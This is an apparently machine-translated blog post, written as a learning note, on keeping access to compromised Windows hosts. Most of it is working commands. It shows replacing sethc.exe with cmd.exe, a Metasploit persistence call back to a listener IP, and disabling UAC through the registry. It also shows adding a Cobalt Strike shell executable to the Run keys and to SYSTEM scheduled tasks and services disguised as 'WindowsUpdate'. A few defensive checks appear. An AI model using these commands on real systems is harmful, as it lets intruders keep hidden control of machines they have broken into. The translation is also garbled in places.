Suddenly aware of the importance of permission maintenance, I have always focused on how to obtain permission, but ignored how to maintain it after obtaining permission. This article is recorded as a learning note. Welcome to discuss it

Auxiliary function rear door

Accessibility provides other options (on-screen keyboard, magnifying glass, screen reading, etc.) to help people with disabilities use the Windows operating system more easily. However, this feature may be abused to achieve persistence on hosts that have RDP enabled and have administrator level permissions.

On screen keyboard: C:\Windows\System32\osk.exe
 magnifier: C:\Windows\System32\Magnify.exe
 Narrator: C:\Windows\System32\Narrator.exe
 Display switch: C:\Windows\System32\DisplaySwitch.exe
 Application Switch: C:\Windows\System32\AtBroker.exe
 Sticky key: C:\Windows\System32\sethc.exe
 Accessibility: C:\Windows\System32\utilman.exe

 

Sticky key rear door

Take sticky key as an example

Press the "Shift" key 5 times on the Windows host to call up the sticky key. The sticky key of Windows is mainly designed for users who can't press multiple keys at the same time. For example, when using the combination key "Crl+P", the user needs to press both "Crl" and "P" at the same time. If the viscous key is used to realize the function of the combination key "Crl+P", the user only needs to press one key.

Why can the sticky key become a back door? Because the computer can also trigger the sticky key when locking the screen, the permission can be maintained as long as the command of the sticky key is replaced

Replace the sticky key executable file sethc.exe in the windows\system32 directory with the executable file sethc.exe.bak. The command is as follows.

cd c:\windows\system32
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe

However, today's servers generally have no way to execute in this way
We can also use the module in msf to retain and retrieve the back door

In order to use the module in msf to retain and retrieve the rear door

use post/windows/manage/sticky_keys
set session 1
set target UTILMAN
exploit

target can set different methods to leave the back door, including sticky keys

  C:\Windows\System32\sethc.exe sticky key shortcut: press the shift key five times
C:\Windows\System32\utilman.exe set central shortcut: Windows+U
C:\Windows\System32\osk.exe onscreen keyboard

Sticky key attack win2008 (win10 attack failed)

For the sticky key back door, the following preventive measures can be taken.

• When logging in to the server remotely, press the "Shift" key five times to judge whether the server is invaded.
• Reject sethc.exe or turn off the enable Sticky Keys option in the control panel.

 

Registry injection backdoor

Registry is a core database in Windows operating system, which stores various parameters, directly controls the startup of windows, the loading of hardware drivers and the operation of some windows applications, so it plays a core role in the whole system.

Win+r enter regedit to enter the registry editor

The following is the registry information that controls the computer startup key.

The program in Run runs only after WINDOWS is initialized, while the program in RunService starts when the operating system is started, that is, the program in RunServices runs before the program in Run, such as power management program.

#Information storage place used by the current user
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce

#Distribution center of machine software and hardware information
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\wow6432node\microsoft\windows\currentversion\Run

#add to
REG ADD "KeyName" /v "ValueName" /t REG_SZ /d "Data" /f 
#High permissions are required to operate HKEY_LOCAL_MACHINE
#KeyName remote machine name - Ignore the default to the current machine.
#/v The name of the value to add under the selected item. 
#/ve Add a blank value name for the registry key(default). 
#/t RegKey data type REG_SZ Type registry key has no length limit 
#/d Registry to assign to add ValueName Data. 
#/f Forcibly overwrite existing registry keys without prompting.

#query
reg query "KeyName" \v ValueName 
#No permissions required

#delete
reg delete "KeyName" \v ValueName /f 
#High permissions are required to operate HKEY_LOCAL_MACHINE /f Force deletion without prompting. If not, you will be asked whether to delete it

msf registry backdoor

run persistence -U -i 5 -p 5555 -r 192.168.200.36

-S: Load at system startup

-U: Load when user logs in

-10: Auto load at startup

-i: Time interval of loopback

-r: The computer IP of your receiving shell

 

  I want to restart monitoring to see if I can go online, but I can't use win10, win7 and win2008. And win7 blew me up. Every time I open it, the window will pop up

 

registry

Specifies whether to notify the user of Windows user account control (UAC) when the program attempts to make changes to the computer. UAC was formerly known as Restricted user account (LUA).

Use the command to set EnableLUA to 0 (after the interview, it doesn't matter whether you change this or not)

shell reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

query

shell reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"

Insert it directly into the registry and become a self startup file

shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Users\testuser\Desktop\cs_shell.exe" /f

Whether the query is set successfully

shell reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

  You can see that the setting is successful

Restart and try - successfully Online

 

  Planning task backdoor

Scheduled tasks are called with the at command in the operating system of Windows 7 and earlier, and with the schtasks command in the operating system of Windows 8. The back door of scheduled tasks is divided into administrator permission and ordinary user permission. The back door of administrator permission can set more scheduled tasks, such as running after restart.

  at scheduled tasks:

at \\192.168.200.36 13:56 C:\shell.exe   #Create a scheduled task until time to open the shell.exe program

schtasks plan tasks. Reference Schtasks command details _jataflf's column - CSDN blog

schtasks /create /s 192.168.200.36 /tn test /sc once /st 17:07 /tr c:\shell.exe /ru system /f   #Create a scheduled task
schtasks /create /s 192.168.200.36 /tn test /sc onstart /sd 12/4/2021  /tr c:\shell.exe /ru system /f   #Execute scheduled tasks at system startup
schtasks /create /s 192.168.200.36 /tn test /sc minute /mo 10 /tr c:\shell.exe /ru system /f  #Perform the planned task every ten minutes

 

Using cs's backdoor demo to schedule tasks

Use cs to generate an exe backdoor. If cs is online, it is assumed that it has obtained the permission of the target host. Now start to maintain the permission

  Plan tasks after going online

Every minute

schtasks /create /tn WindowsUpdate /tr "C:\Users\fish\Desktop\cs_shell.exe" /sc minute /mo 1 /ru System /f

Or when the system starts

schtasks /create /tn WindowsUpdate /tr "C:\Users\fish\Desktop\cs_shell.exe" /sc onstart /ru System /f

You can see that it will go online automatically as soon as you start up

 

  Service self start

  It is similar to the planned task, but it can only be started at startup. sc is used to create service entries in the registry and service database. What Microsoft found means to create subkeys and entries for the service and service control manager database in the registry

Assuming you get the shell of the target host, you can enter the following statement to establish a service self starting back door  

sc create "test" binpath= "C:\Users\fish\Desktop\cs_shell.exe" start=auto displayname="Windows-Update"
sc description "test ""test"
net start "test"
sc query test   #Query service item
sc delete test  #delete

  Start this service and test it. It goes online successfully

 

The task manager can view the set services

After restarting win10, it is still online

 

startup folder

Simply mention it

Windows system has a "startup" folder. Put the shortcut of the program to be opened into the "startup" folder to realize automatic startup.

If you want to realize that the application can start automatically after all users log in to the system, put the shortcut of the application in the system startup folder

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

If you want an application to start automatically only when a user logs in to the system, put the shortcut of the application in the user startup folder.

C:\Users\fish\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup